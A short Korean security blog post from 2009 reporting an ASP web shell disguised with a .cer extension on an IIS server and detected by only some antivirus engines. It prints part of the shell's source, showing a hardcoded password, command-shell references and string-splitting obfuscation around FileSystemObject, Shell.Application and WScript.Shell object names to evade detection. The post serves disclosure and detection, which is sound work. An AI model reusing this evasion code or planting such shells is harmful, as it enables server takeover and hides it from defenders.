IIS 웹 서버의 asp.dll 파일에 맵핑되어 있는 cer 확장자로 위장된 웹쉘이 발견되었습니다. 이 웹쉘은 ASP木2006 툴로 제작된 것으로 바이러스토탈 사이트에서 검사 결과, 우회코드로 인하여 일부 백신에서만 탐지하는 것으로 확인되었습니다.

--- top.cer 웹 쉘 일부 내용 ( 우회코드 ) -----

 Const m = "xl"
 Const showLogin = "xl"
 Const clientPassword = "#"
 Const dbSelectNumber = 10
 Const isDebugMode = False
 Const myName = "??去了"
 Const notdownloadsExists = False
 Const userPassword = "xiaonong"
 Const MyCmdDoTExeFiLe = "cOmmaNd.coM"
 ConSt strJSCloSeMe = "<inPut tYpe=butTon vAluE=' ?? ' onClick='wiNdow.cloSe();'>"

 Sub creAteIT(fSoX, SaX, wSX)
  If isDebugMode = False Then
   On Error Resume Next
  End If

  Set fsoX = Server.CreateObject("Scripting.FileSy"&x&"stemObject")
  If IsEmpty(fsoX) And (pagename = "FsoFile"&x&"Explorer" Or theAct = "fsoSe"&x&"arch") Then
   Set fsoX = fso
  End If

  Set saX = Server.CreateObject("Shell.Ap"&x&"plication")
  If IsEmpty(saX) And (pagename = "AppFileExplorer" Or pagename = "Sa"&x&"CmdRun" Or theAct = "saSe"&x&"arch") Then
   Set saX = sa
  End If

  Set wsX = Server.CreateObject("WScrip"&x&"t.Shell")
  If IsEmpty(wsX) And (pagename = "WsCm"&x&"dRun" Or theAct = "getTermina"&x&"lInfo" Or theAct = "readR"&x&"eg") Then
   Set wsX = ws
  End If

  If Err Then
   Err.Clear
  End If
 End Sub

----------------------

카스퍼스카이가 못 잡다니..... 예상 밖이네요..

사용자 삽입 이미지


2009/08/25 14:39 2009/08/25 14:39

Trackback Address :: 이 글에는 트랙백을 보낼 수 없습니다